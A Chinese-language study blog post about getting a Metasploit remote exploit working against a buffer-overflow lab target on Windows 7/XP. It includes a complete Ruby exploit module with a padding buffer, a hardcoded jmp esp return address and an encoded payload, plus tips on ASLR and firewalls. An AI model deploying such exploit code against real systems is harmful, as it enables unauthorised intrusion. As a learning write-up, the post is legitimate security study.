msf 这个工具 在我还没有开始学pwn 就有搞web的人 说过这个框架
只是没有怎么了解
没有想到这个工具 竟然使用Ruby 写的,, 社会 社会,。
然后这里 关于在 windows下的安装 我就不说了 反正 都一样(直接用kail的就行)
不过 有一点 感觉很坑 就是 版本不一样 然后 导致我们写的 exploit 可能会加载失败,,(可能是)
这里我也不太确定,因为我也不太熟悉rust开发 更不熟悉msf的框架
但是 我历经了大半天 还是把这个环境给搞定了, 效果截图
可以看到 我用的是 windows 7 x86
其实我已经装上了 XP 还有windows 2000 为啥要用 win7
这里就是我要说的第一个坑点了
一定要用程序来找一下 jmp esp 这里win7 因为开了 加载基址随机化 所以每次开机都要重新 查找一次
但是 xp 和 2000 不用
第二个坑点就是 一定要把 攻击机的防火墙给关了
第三个坑点就是 编译的程序尽量用 release 版本的 不要用 debug版本的
然后 这里贴上 我改过的模块
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
include Msf::Exploit::Remote::Ftp
def initialize(info = {})
super(update_info(info,
'Name' => 'security test',
'Description' => %q{
This module exploits a buffer overflow.
},
'Author' => 'fwd',
'License' => MSF_LICENSE,
'Privileged' => true,
'Payload' =>
{
'Space' => 300,
'BadChars' => "\x00",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP Pro SP2 English', { 'Ret' => 0x770445ee } ],
]))
end
def exploit
connect
attack_buf = 'a'*200
attack_buf += [target.ret].pack('V')
attack_buf += payload.encoded
sock.put(attack_buf)
handler
disconnect
end
end
然后就是我的攻击机的 环境
windows 10 然后 msf版本 是
然后这里可以看出 我已经利用成功了
那么我这里就看一下利用方法,。
其实利用方法没有什么好说的 其实和上一篇的那个本地的 只不过这里 是用的socket网络链接
然后可以让我们 感受到实战的感觉
payload 用的是 msf自己生成的 然后我们只需要 找到方法自己生成 paload 就可以了
下面 开始windows2000的 堆^=^